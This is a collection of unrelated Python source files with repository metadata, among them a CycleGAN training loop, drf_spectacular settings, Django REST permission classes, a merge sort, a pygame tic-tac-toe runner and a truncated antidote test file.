pointer = 0
num_images = min(ds.num_images_a, ds.num_images_b)
for i in range(num_images // train_step['batch_size']):
start = pointer
pointer += train_step['batch_size']
if pointer > num_images: # if ended 1 epoch
# Shuffle training DataSet
perm_a, perm_b = np.arange(ds.num_images_a), np.arange(ds.num_images_b)
np.random.shuffle(perm_a)
np.random.shuffle(perm_b)
                    img_a, img_b = img_a[perm_a], img_b[perm_b]
start = 0
pointer = train_step['batch_size']
end = pointer
batch_a = np.reshape(img_a[start:end], model.image_shape)
                batch_b = np.reshape(img_b[start:end], model.image_shape)
for _ in range(model.n_train_critic):
s.run(model.d_op,
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
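                # (WGAN-style schedule: the critic op d_op is stepped
                #  n_train_critic times per generator update; the w and gp
                #  fetched below are the Wasserstein estimate and gradient
                #  penalty, reported for logging.)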
w, gp, g_loss, cycle_loss, _ = s.run([model.w, model.gp, model.g_loss, model.cycle_loss, model.g_op],
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
if global_step % train_step['logging_step'] == 0:
# Summary
summary = s.run(model.merged,
feed_dict={
model.a: batch_a,
model.b: batch_b,
model.lr_decay: lr_decay,
})
# Print loss
print("[+] Global Step %08d =>" % global_step,
" G loss : {:.8f}".format(g_loss),
" Cycle loss : {:.8f}".format(cycle_loss),
" w : {:.8f}".format(w),
" gp : {:.8f}".format(gp))
# Summary saver
model.writer.add_summary(summary, global_step=global_step)
                # Sample translations from G on the fixed validation images
samples_a2b = s.run(model.g_a2b,
feed_dict={
model.a: sample_a,
model.b: sample_b,
model.lr_decay: lr_decay,
})
samples_b2a = s.run(model.g_b2a,
feed_dict={
model.a: sample_a,
model.b: sample_b,
model.lr_decay: lr_decay,
})
# Export image generated by model G
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir_a2b = results['output'] + 'train_a2b_{0}.png'.format(global_step)
sample_dir_b2a = results['output'] + 'train_b2a_{0}.png'.format(global_step)
# Generated image save
iu.save_images(samples_a2b, [sample_image_height, sample_image_width], sample_dir_a2b)
iu.save_images(samples_b2a, [sample_image_height, sample_image_width], sample_dir_b2a)
# Model save
model.saver.save(s, results['model'], global_step=global_step)
global_step += 1
end_time = time.time() - start_time # Clocking end
# Elapsed time
print("[+] Elapsed time {:.8f}s".format(end_time))
# Close tf.Session
s.close()
if __name__ == '__main__':
main()
|
[
"kozistr@gmail.com"
] |
kozistr@gmail.com
|
7ad2d903281abb04ba6f20108a4630a5b564596b
|
3641fd4b6e160be9da77b000935ddee5247fc601
|
/drf_spectacular/settings.py
|
2a35cc632b6470e489771e150c16eb2d78baeda8
|
[
"BSD-3-Clause"
] |
permissive
|
tiago-peres/drf-spectacular
|
02f404380bad0d63e7a47ddcd43cdb5d93a97ba3
|
244be7a61b8f5e96f05797f1e73fb651b4e6b6a0
|
refs/heads/master
| 2023-01-06T17:22:08.860293
| 2020-10-29T19:42:25
| 2020-10-29T19:45:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,754
|
py
|
from typing import Any, Dict
from django.conf import settings
from rest_framework.settings import APISettings
SPECTACULAR_DEFAULTS: Dict[str, Any] = {
# path prefix is used for tagging the discovered operations.
# use '/api/v[0-9]' for tagging apis like '/api/v1/albums' with ['albums']
'SCHEMA_PATH_PREFIX': r'',
'DEFAULT_GENERATOR_CLASS': 'drf_spectacular.generators.SchemaGenerator',
# Schema generation parameters to influence how components are constructed.
# Some schema features might not translate well to your target.
# Demultiplexing/modifying components might help alleviate those issues.
#
# Create separate components for PATCH endpoints (without required list)
'COMPONENT_SPLIT_PATCH': True,
# Split components into request and response parts where appropriate
'COMPONENT_SPLIT_REQUEST': False,
# Aid client generator targets that have trouble with read-only properties.
'COMPONENT_NO_READ_ONLY_REQUIRED': False,
# Configuration for serving the schema with SpectacularAPIView
'SERVE_URLCONF': None,
# complete public schema or a subset based on the requesting user
'SERVE_PUBLIC': True,
    # include the schema endpoint itself in the generated schema
'SERVE_INCLUDE_SCHEMA': True,
'SERVE_PERMISSIONS': ['rest_framework.permissions.AllowAny'],
# Dictionary of configurations to pass to the SwaggerUI({ ... })
# https://swagger.io/docs/open-source-tools/swagger-ui/usage/configuration/
'SWAGGER_UI_SETTINGS': {
'deepLinking': True,
},
'SWAGGER_UI_DIST': '//unpkg.com/swagger-ui-dist@3.35.1',
'SWAGGER_UI_FAVICON_HREF': '//unpkg.com/swagger-ui-dist@3.35.1/favicon-32x32.png',
# Append OpenAPI objects to path and components in addition to the generated objects
'APPEND_PATHS': {},
'APPEND_COMPONENTS': {},
# DISCOURAGED - please don't use this anymore as it has tricky implications that
# are hard to get right. For authentication, OpenApiAuthenticationExtension are
# strongly preferred because they are more robust and easy to write.
# However if used, the list of methods is appended to every endpoint in the schema!
'SECURITY': [],
# Postprocessing functions that run at the end of schema generation.
# must satisfy interface result = hook(generator, request, public, result)
'POSTPROCESSING_HOOKS': [
'drf_spectacular.hooks.postprocess_schema_enums'
],
# Preprocessing functions that run before schema generation.
# must satisfy interface result = hook(endpoints=result) where result
# is a list of Tuples (path, path_regex, method, callback).
# Example: 'drf_spectacular.hooks.preprocess_exclude_path_format'
'PREPROCESSING_HOOKS': [],
# enum name overrides. dict with keys "YourEnum" and their choice values "field.choices"
'ENUM_NAME_OVERRIDES': {},
# function that returns a list of all classes that should be excluded from doc string extraction
'GET_LIB_DOC_EXCLUDES': 'drf_spectacular.plumbing.get_lib_doc_excludes',
# Function that returns a mocked request for view processing. For CLI usage
# original_request will be None.
# interface: request = build_mock_request(method, path, view, original_request, **kwargs)
'GET_MOCK_REQUEST': 'drf_spectacular.plumbing.build_mock_request',
# Camelize names like operationId and path parameter names
'CAMELIZE_NAMES': False,
# General schema metadata. Refer to spec for valid inputs
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.3.md#openapi-object
'TITLE': '',
'DESCRIPTION': '',
'TOS': None,
# Optional: MAY contain "name", "url", "email"
'CONTACT': {},
# Optional: MUST contain "name", MAY contain URL
'LICENSE': {},
'VERSION': '0.0.0',
# Optional list of servers.
# Each entry MUST contain "url", MAY contain "description", "variables"
'SERVERS': [],
# Tags defined in the global scope
'TAGS': [],
# Optional: MUST contain 'url', may contain "description"
'EXTERNAL_DOCS': {},
# Oauth2 related settings. used for example by django-oauth2-toolkit.
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.3.md#oauth-flows-object
'OAUTH2_FLOWS': [],
'OAUTH2_AUTHORIZATION_URL': None,
'OAUTH2_TOKEN_URL': None,
'OAUTH2_REFRESH_URL': None,
'OAUTH2_SCOPES': None,
}
IMPORT_STRINGS = [
'SCHEMA_AUTHENTICATION_CLASSES',
'DEFAULT_GENERATOR_CLASS',
'SERVE_PERMISSIONS',
'POSTPROCESSING_HOOKS',
'PREPROCESSING_HOOKS',
'GET_LIB_DOC_EXCLUDES',
'GET_MOCK_REQUEST',
]
spectacular_settings = APISettings(
user_settings=getattr(settings, 'SPECTACULAR_SETTINGS', {}),
defaults=SPECTACULAR_DEFAULTS,
import_strings=IMPORT_STRINGS,
)
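# Usage sketch (hypothetical project settings.py): a project overrides these
# defaults by defining SPECTACULAR_SETTINGS, which APISettings reads above:
#
#   SPECTACULAR_SETTINGS = {
#       'TITLE': 'My API',
#       'VERSION': '1.0.0',
#       'SCHEMA_PATH_PREFIX': r'/api/v[0-9]',
#   }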
|
[
"13507857+tfranzel@users.noreply.github.com"
] |
13507857+tfranzel@users.noreply.github.com
|
7221754c6507e44f0dce9224f846bc2bc2c1a474
|
217ee146317a3211622754fad14a67d9a1236dee
|
/modules/sites/__init__.py
|
69c26c39bf2b869e968f14120772d36080712b0c
|
[
"MIT"
] |
permissive
|
Swapnil074/stopstalk-deployment
|
45a5e57d278ed38f7e0f528ad751813738504439
|
ab7b988105c880d7015c9eb0ccaef7acf87de953
|
refs/heads/master
| 2022-07-20T16:24:04.690019
| 2020-05-13T05:11:45
| 2020-05-13T05:11:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
"""
Copyright (c) 2015-2020 Raj Patel(raj454raj@gmail.com), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import codechef
import codeforces
import spoj
import hackerearth
import hackerrank
import uva
import timus
|
[
"raj454raj@gmail.com"
] |
raj454raj@gmail.com
|
24f7c3e99c2b67bfcbb4983009e5367253732ee5
|
deaa2ad0981659542b7518227eaa9b716545e3cc
|
/backend/authentication/permission.py
|
78c45835d020c58dce97c61b35e1b992f4dbac9f
|
[] |
no_license
|
crabfishxy/SE-TSS
|
aec9d12eee82f06843f4f7501535ae5b9fd74f83
|
b5b0584b2332bbbd8f0e283f3b8a83cde916e9c9
|
refs/heads/master
| 2020-03-19T07:49:28.221760
| 2018-06-03T13:24:33
| 2018-06-03T13:24:33
| 136,151,755
| 0
| 0
| null | 2018-06-05T09:15:49
| 2018-06-05T09:15:49
| null |
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
from rest_framework import permissions
class RegisterCheck(permissions.BasePermission):
    def has_permission(self, request, view):
        return request.user.user_type == 4
class StudentCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/student/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 3 or type == 4:
return True
# some info
else:
if type == 1 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 1:
if request.user.username == obj.username.username:
return True
else:
return False
else:
return True
class FacultyCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/faculty/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 3 or type == 4:
return True
# some info
else:
if type == 2 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 2:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class StaffCheck(permissions.BasePermission):
def has_permission(self, request, view):
url = "/api/staff/"
type = request.user.user_type
path = request._request.path
# all info
if path == url:
if type == 4:
return True
# some info
else:
if type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 3:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class AdminCheck(permissions.BasePermission):
    def has_permission(self, request, view):
        return request.user.user_type == 4
def has_object_permission(self, request, view, obj):
type = request.user.user_type
if type == 4:
if request.user.username == obj.name:
return True
else:
return False
else:
return True
class CourseCheck(permissions.BasePermission):
def has_permission(self, request, view):
type = request.user.user_type
if type == 2 or type == 3 or type == 4:
return True
return False
def has_object_permission(self, request, view, obj):
return True
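# Usage sketch (hypothetical view, not part of this module): attach a check
# to a DRF view through permission_classes, e.g.
#
#   from rest_framework.views import APIView
#
#   class StudentView(APIView):
#       permission_classes = [StudentCheck]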
|
[
"690764871@qq.com"
] |
690764871@qq.com
|
260de58bcf5629fc47a52af9d530ff5e2524f762
|
e7805d33d8f98a4c514373ac98db219e50df750e
|
/main.py
|
6915091de896a3e90aaa467f440c7ac7d05e6d16
|
[] |
no_license
|
MadmanSilver/my-first-neural-net
|
5265a3cabc9207509a7de5c76004ae2287303889
|
76cf1093bc0545aaf52b8b29f81828ea6092b350
|
refs/heads/main
| 2023-02-23T17:42:41.391353
| 2021-01-24T05:41:49
| 2021-01-24T05:41:49
| 311,505,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 643
|
py
|
from perset import PerSet
from random import uniform
filename = "training.txt"
max_words = 0
max_letters = 0
with open(filename, "r") as f:
    for line in f.read().split('\n'):
        words = line.split('/')[0].split()
        if len(words) > max_words:
            max_words = len(words)
        for word in words:
            if len(word) > max_letters:
                max_letters = len(word)
set1 = PerSet({l: uniform(0.0, 1.0) for l in "abcdefghijklmnopqrstuvwxyz"}, [[uniform(-4.0, 4.0) for l in range(max_letters)] for w in range(max_words)], [[uniform(-4.0, 4.0) for j in range(3)] for i in range(max_words)])
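# (Shapes inferred from the comprehensions above: PerSet receives a
#  letter -> initial-value map, a max_words x max_letters weight grid, and a
#  max_words x 3 output-weight grid; PerSet itself is defined in perset.py.)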
set1.train(filename)
print(set1.err)
|
[
"silverwolf4350@gmail.com"
] |
silverwolf4350@gmail.com
|
5a77f9bef1584293472acf02c7fa99e2e71c0e81
|
5e9ee05dce9287279223242a65f005a24db5e323
|
/count-lines.py
|
d63c45cf4e6776f0b7c386c123ed7ff30e2777fe
|
[] |
no_license
|
LeslieMooyaart/patients-analysis
|
205e4ffe4284456451a1dac10f07da640c616d68
|
b726f1cd8baf31b2fc2b8f2a29a98b7cf566dad4
|
refs/heads/master
| 2023-06-02T19:38:24.201862
| 2021-06-22T14:20:38
| 2021-06-22T14:20:38
| 379,275,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
import sys
"""Adding documentation locally
Adding documentation remotely"""
count = 0
for line in sys.stdin:
count += 1
print(count, 'lines in standard input')
|
[
"l.f.mooyaart@tudelft.nl"
] |
l.f.mooyaart@tudelft.nl
|
dee0dd4897a3885c08bea8fc4eee4f83b31eee8e
|
4373488e0a2a34734fc6f6ffc7729e353c25fdfa
|
/exception_example.py
|
c8c84f10f12115c0d8ac3fae1e3a5599656d3436
|
[] |
no_license
|
dmc200/Python-Projects
|
9a141b28004c913f7ec3714cbbdb7a9ed8952922
|
bcba096183d56fcbcc6f5869bd6ac32b87ce3720
|
refs/heads/master
| 2021-06-17T10:05:05.711876
| 2019-10-25T18:19:46
| 2019-10-25T18:19:46
| 202,403,008
| 0
| 0
| null | 2021-06-10T22:09:39
| 2019-08-14T18:16:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 855
|
py
|
'''
def div42by(divideBy):
return 42 /divideBy
try:
print(div42by(1))
print(div42by(1))
print(div42by(0))
print(div42by(1))
except ZeroDivisionError:
print("You have tried to divide by 0")
finally:
print("This is finally done")
'''
play = True
while play:
print("How many cats do you have?")
numCats = input()
try:
if int(numCats) >= 4:
print("Wow that is a lot of cats!")
elif int(numCats) < 0:
myError = ValueError('# of cats should be a positive number')
raise myError
else:
print("Not that many cats")
break
except ValueError:
print("Not in integer, try again")
play = input("Again?").lower()
if play == 'y':
play = True
else:
play = False
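# Note: the except ValueError above catches both the explicitly raised
# myError and the ValueError that int(numCats) raises on non-numeric input.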
|
[
"dean.chirieleison@outlook.com"
] |
dean.chirieleison@outlook.com
|
2c0dbf6acab109eb25c2d20033d8b05a692120fd
|
bd4955a474ec94f1d240641a303916f25e149333
|
/new/csvproject/csvproject/asgi.py
|
04124c3447788b1601a3e56798f390b794e260df
|
[] |
no_license
|
pranavsharma707/csvproject
|
8d8de7c84fef211f99d06fffc65d5b59cdae164e
|
bc22cfcade2acba690328e185f545dc64045dce7
|
refs/heads/master
| 2023-07-14T14:31:59.607320
| 2021-08-25T13:19:58
| 2021-08-25T13:19:58
| 399,701,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
ASGI config for csvproject project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvproject.settings')
application = get_asgi_application()
|
[
"pranavsharma.bluethink@gmail.com"
] |
pranavsharma.bluethink@gmail.com
|
8ba930f1c714f0c44e85c4caa833e69602d2cab8
|
e993298ef337133c1c2997812904fca12fd91fde
|
/blue_garden/usr_login/usersdict.py
|
51ea982d126b5a422f506b697e888107b9ac683f
|
[] |
no_license
|
jloc8749/info9117
|
54cbf91b8afe2f03cf8283dfe16a27cec86552c4
|
b256eec143c38489b6ca0587eacb11cbfa8f97d4
|
refs/heads/master
| 2021-01-10T09:50:31.239944
| 2016-04-13T05:36:39
| 2016-04-13T05:36:39
| 52,838,194
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 937
|
py
|
#make dict of users
testuser = 'jlock'
testpass = 'jlock'
usr_dict = {}
def usrdict():
with open('users','r') as u:
for each in u:
usrname, usrpass = each.split()
usr_dict[usrname] = usrpass
#return usrdict
def authuser(nombre, llave):
    usrdict()
    if nombre in usr_dict:
        if usr_dict[nombre] == llave:
            return True
    return False
def newuser(nombre,llave):
usrdict()
with open('users','a') as u:
if nombre not in usr_dict:
#u.write(nombre + ' ' + llave + '/n') #appending to the same line..
print (nombre + ' ' + llave, file=u)
def rm_usr(nombre,llave):
tmp = []
with open('users','r') as u:
for line in u:
if nombre+' '+llave not in line:
tmp.append(line)
with open('users','w') as u:
for line in tmp:
print(line.strip(), file=u)
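# Usage sketch: the "users" file stores one "name password" pair per line.
#   newuser('alice', 'secret')     # appends a line if 'alice' is new
#   authuser('alice', 'secret')    # -> True on a match
#   rm_usr('alice', 'secret')      # rewrites the file without that pair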
|
[
"jloc8749@uni.syd.edu.au"
] |
jloc8749@uni.syd.edu.au
|
924887382913b82d8d2d05d43ee875974db1d057
|
cbac621ad77787ebe9bda49976dab711e3169362
|
/commercia/products/management/commands/remove_categories.py
|
db4ef8ef9ada36c1898e271a41801c13cf5dca57
|
[] |
no_license
|
commoncode/economica
|
08292f28048281ee986ce4419c7d0af54ccad1db
|
3de2415d7f0e0e81cc6ac7a054839daeb1ba6748
|
refs/heads/master
| 2016-09-05T12:49:21.107938
| 2014-08-04T04:50:43
| 2014-08-04T04:50:43
| 9,742,821
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
from django.core.management.base import BaseCommand
from ...models import Category
class Command(BaseCommand):
    help = 'Delete all Category objects'
def handle(self, *args, **options):
Category.objects.all().delete()
|
[
"dboy.y3k@gmail.com"
] |
dboy.y3k@gmail.com
|
59b2814b3a0dbeb677cab11c92ad4e0fcb9478f3
|
46ef1b8df9551c02c273ed39bd057daadca0e1fe
|
/parts/wrapper/zope/component/event.py
|
12abd1cfcc204ce689d7c2d5f7876ddf40d08551
|
[] |
no_license
|
topiaruss/bfg-gae-logger
|
18f5a25168656afcabe1c89a9c7e0e25aa060c56
|
f2944f2c009007efd0fd09426111e4dfdab30098
|
refs/heads/master
| 2021-01-20T04:40:05.194810
| 2010-05-26T20:31:02
| 2010-05-26T20:31:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 92
|
py
|
/Users/russ/.common/sh/.buildout/eggs/zope.component-3.9.4-py2.5.egg/zope/component/event.py
|
[
"russf@topia.com"
] |
russf@topia.com
|
4b89f7e8772827e23a6837fea948a8864f3ca14e
|
57d07cbe26827e3610f14294d00db60e62deb0c6
|
/BJ/sort/수정렬하기2/mergeSort.py
|
484275d7dfbccd645d12398be2b009577d9faba5
|
[] |
no_license
|
wseungjin/AlgorithmCoding
|
98083f5b87db17bf4449c1ca23216dfa5fd66f73
|
00dc9a76ef1a890ddf185d1b7feecc71b2c95296
|
refs/heads/master
| 2021-06-22T04:02:30.390820
| 2021-04-12T15:00:16
| 2021-04-12T15:00:16
| 209,197,457
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
# f = open("input.txt", 'r')
# line = f.readline()
line = input()
num = int(line)
array = []
for i in range(num):
# line = f.readline()
line = input()
array.append(int(line))
def mergeSort(list):
    if len(list) <= 1:
        return list
    mid = len(list) // 2
    leftList = list[0:mid]
    rightList = list[mid:len(list)]
    leftList = mergeSort(leftList)
    rightList = mergeSort(rightList)
    return merge(leftList, rightList)
def merge(left, right):
    mergedList = []
    while len(left) != 0 or len(right) != 0:
        if len(left) == 0:
            mergedList.append(right[0])
            right.pop(0)
        elif len(right) == 0:
            mergedList.append(left[0])
            left.pop(0)
        elif left[0] > right[0]:
            mergedList.append(right[0])
            right.pop(0)
        else:
            mergedList.append(left[0])
            left.pop(0)
    return mergedList
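# Worked example (comments only): mergeSort([3, 1, 2])
#   -> merge([3], merge([1], [2])) -> merge([3], [1, 2]) -> [1, 2, 3]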
array=mergeSort(array)
for i in range(num):
print(array[i])
|
[
"bose1021@naver.com"
] |
bose1021@naver.com
|
c8b5729bd9c20925ad5ceacf9485ae56d25d8550
|
6dd6ff94464d53d5d65e36e86ece49f2902bc85f
|
/coupons/views.py
|
813aea7b230f7875ec1c3d88983abe228e08736a
|
[] |
no_license
|
onealwills/myshop
|
6914981ba9de60316f9196ebf4a25ada87e81864
|
248a575072a8e9d5553d507b6a80f798e3bb8f39
|
refs/heads/main
| 2023-07-06T02:01:59.233570
| 2021-08-13T08:52:54
| 2021-08-13T08:52:54
| 394,821,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
from django.shortcuts import render, redirect
from django.utils import timezone
from django.views.decorators.http import require_POST
from .models import Coupon
from .forms import CouponApplyForm
# Create your views here.
@require_POST
def coupon_apply(request):
now = timezone.now()
form = CouponApplyForm(request.POST)
if form.is_valid():
code = form.cleaned_data['code']
try:
coupon = Coupon.objects.get(code__iexact=code,
valid_from__lte=now,
valid_to__gte=now,
active=True)
request.session['coupon_id'] = coupon.id
except Coupon.DoesNotExist:
request.session['coupon_id'] = None
return redirect('cart:cart_detail')
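# For context (hedged sketch -- the real definition lives in .forms):
# CouponApplyForm is presumably a plain form with a single "code" field,
# matching the form.cleaned_data['code'] lookup above:
#
#   class CouponApplyForm(forms.Form):
#       code = forms.CharField()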
|
[
"oneal.wills@gmail.com"
] |
oneal.wills@gmail.com
|
afa0407ed6f5d1af4d9575f2a95b7ab3e70e86b9
|
72e8d6fea71e523cee9aee585b7b52fccf36d4b5
|
/PythonExercicios/ex002.py
|
e01d06a9d6386ce09830cc06f9c987ff9fd5cb32
|
[] |
no_license
|
maripaixao/PycharmProjects
|
e7939857ec995c39b4fb2e85f5075b41614509e8
|
3ecfa9aa6616c3bdcb5f0c029fdda2ea68e55d3c
|
refs/heads/master
| 2023-06-19T00:54:52.420194
| 2021-07-19T21:18:34
| 2021-07-19T21:18:34
| 387,594,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 81
|
py
|
nome = input("Qual seu nome?")
print("Prazer em te conhecer, {}!".format(nome))
|
[
"marinapaixao.25@gmail.com"
] |
marinapaixao.25@gmail.com
|
f247cedc5f3d6f037b2f74c163e14180b0a056fd
|
53909cfcc2b142716021bf8589cccc37c426aa9c
|
/bin/blogtk2
|
2c2e50e6a98bd225e96d115696f9071700abf738
|
[
"Apache-2.0"
] |
permissive
|
Ryuno-Ki/BloGTK3
|
7fba56ed0f6ed36eadadad374cf5e045fd9167e0
|
e410f164cb82ff37ca9c0f3ebaf8e57b76139551
|
refs/heads/master
| 2016-09-06T02:03:56.552113
| 2013-06-07T08:39:52
| 2013-06-07T08:39:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
#!/usr/bin/env python
import sys
from os.path import dirname, join, pardir
sys.path.insert(0, join(dirname(__file__), pardir, 'share',
'blogtk2', 'lib'))
from blogtk2 import main
main()
|
[
"AndreJaenisch@googlemail.com"
] |
AndreJaenisch@googlemail.com
|
|
87769f81ff8aa748efc928170fe85552099057a8
|
bf1af2969ce4952360c604844b1468e4ebce2fc6
|
/tictactoe/runner.py
|
35f1777fee7e44cf3be411a245a92b42f55b11e3
|
[] |
no_license
|
emreisler/myprojects
|
2de7dbda68d6009bd19b640f5ef6ddae06748244
|
2d408cf2919aea4cfd8783b9e5dc2696d9d6b806
|
refs/heads/master
| 2023-01-05T20:53:53.420342
| 2020-11-04T12:25:54
| 2020-11-04T12:25:54
| 293,348,825
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
import pygame
import sys
import time
import tictactoe as ttt
pygame.init()
size = width, height = 600, 400
# Colors
black = (0, 0, 0)
white = (255, 255, 255)
screen = pygame.display.set_mode(size)
mediumFont = pygame.font.Font("OpenSans-Regular.ttf", 28)
largeFont = pygame.font.Font("OpenSans-Regular.ttf", 40)
moveFont = pygame.font.Font("OpenSans-Regular.ttf", 60)
user = None
board = ttt.initial_state()
ai_turn = False
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
screen.fill(black)
# Let user choose a player.
if user is None:
# Draw title
title = largeFont.render("Play Tic-Tac-Toe", True, white)
titleRect = title.get_rect()
titleRect.center = ((width / 2), 50)
screen.blit(title, titleRect)
# Draw buttons
playXButton = pygame.Rect((width / 8), (height / 2), width / 4, 50)
playX = mediumFont.render("Play as X", True, black)
playXRect = playX.get_rect()
playXRect.center = playXButton.center
pygame.draw.rect(screen, white, playXButton)
screen.blit(playX, playXRect)
playOButton = pygame.Rect(5 * (width / 8), (height / 2), width / 4, 50)
playO = mediumFont.render("Play as O", True, black)
playORect = playO.get_rect()
playORect.center = playOButton.center
pygame.draw.rect(screen, white, playOButton)
screen.blit(playO, playORect)
# Check if button is clicked
click, _, _ = pygame.mouse.get_pressed()
if click == 1:
mouse = pygame.mouse.get_pos()
if playXButton.collidepoint(mouse):
time.sleep(0.2)
user = ttt.X
elif playOButton.collidepoint(mouse):
time.sleep(0.2)
user = ttt.O
else:
# Draw game board
tile_size = 80
tile_origin = (width / 2 - (1.5 * tile_size),
height / 2 - (1.5 * tile_size))
tiles = []
for i in range(3):
row = []
for j in range(3):
rect = pygame.Rect(
tile_origin[0] + j * tile_size,
tile_origin[1] + i * tile_size,
tile_size, tile_size
)
pygame.draw.rect(screen, white, rect, 3)
if board[i][j] != ttt.EMPTY:
move = moveFont.render(board[i][j], True, white)
moveRect = move.get_rect()
moveRect.center = rect.center
screen.blit(move, moveRect)
row.append(rect)
tiles.append(row)
game_over = ttt.terminal(board)
player = ttt.player(board)
# Show title
if game_over:
winner = ttt.winner(board)
if winner is None:
title = f"Game Over: Tie."
else:
title = f"Game Over: {winner} wins."
elif user == player:
title = f"Play as {user}"
else:
title = f"Computer thinking..."
title = largeFont.render(title, True, white)
titleRect = title.get_rect()
titleRect.center = ((width / 2), 30)
screen.blit(title, titleRect)
# Check for AI move
if user != player and not game_over:
if ai_turn:
time.sleep(0.5)
move = ttt.minimax(board)
board = ttt.result(board, move)
ai_turn = False
else:
ai_turn = True
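                # (Setting the flag first defers the minimax call by one
                #  frame, so the "Computer thinking..." title drawn above is
                #  rendered before the search blocks the event loop.)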
# Check for a user move
click, _, _ = pygame.mouse.get_pressed()
if click == 1 and user == player and not game_over:
mouse = pygame.mouse.get_pos()
for i in range(3):
for j in range(3):
if (board[i][j] == ttt.EMPTY and tiles[i][j].collidepoint(mouse)):
board = ttt.result(board, (i, j))
if game_over:
againButton = pygame.Rect(width / 3, height - 65, width / 3, 50)
again = mediumFont.render("Play Again", True, black)
againRect = again.get_rect()
againRect.center = againButton.center
pygame.draw.rect(screen, white, againButton)
screen.blit(again, againRect)
click, _, _ = pygame.mouse.get_pressed()
if click == 1:
mouse = pygame.mouse.get_pos()
if againButton.collidepoint(mouse):
time.sleep(0.2)
user = None
board = ttt.initial_state()
ai_turn = False
pygame.display.flip()
|
[
"noreply@github.com"
] |
emreisler.noreply@github.com
|
cb7487342f6f94441614a56b159aa70cef3ba11e
|
0ce3dfdc3d2de8cdee8116c97ed7a750e02d9040
|
/tests/test_class_auto_wiring.py
|
38255c0998e5c149c78ed9cdebb98701eb32bdf5
|
[
"MIT"
] |
permissive
|
adriangb/antidote
|
c1d3d99406f1efce7b0e1f66373db7c00bbe1077
|
97751e0e6a1b8bd638a1c33212345c7a84ad97b8
|
refs/heads/master
| 2023-09-03T09:58:08.065608
| 2021-11-06T20:56:20
| 2021-11-06T21:48:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,752
|
py
|
import itertools
from typing import Any, Callable, Optional, Tuple, Type, Union
import pytest
from antidote import Constants, Factory, Provide, Service, world, service
from antidote._compatibility.typing import Protocol
from antidote.core import Wiring
class Interface:
pass
class FactoryOutput:
pass
class FactoryOutput2:
pass
class A:
pass
class B:
pass
@pytest.fixture(autouse=True)
def new_world():
with world.test.new():
world.test.singleton({A: A(),
B: B(),
'a': object(),
'b': object(),
'x': object(),
'y': object(),
'z': object()})
yield
class DummyProtocol(Protocol):
a: A
b: B
def __init__(self, a: A = None, b: B = None):
pass
def method_AB(self, a: A = None, b: B = None) -> Tuple[A, B]:
pass
def method_ab(self, a=None, b=None) -> Tuple[Any, Any]:
pass
def method_xyz(self, x=None, y=None, z=None) -> Tuple[Any, Any, Any]:
pass
DEFAULT_WIRING = object()
def builder(cls_or_decorator: Union[type, Callable[..., Any]],
wiring_kind: str = 'Wiring',
subclass: bool = False):
meta_kwargs = dict(abstract=True) if subclass else dict()
if isinstance(cls_or_decorator, type):
cls = cls_or_decorator
def decorator(wiring=None):
return lambda x: x
else:
cls = object
decorator = cls_or_decorator
def build(wiring: Wiring = None):
decorate = (decorator(wiring=wiring)
if wiring is not DEFAULT_WIRING else
decorator())
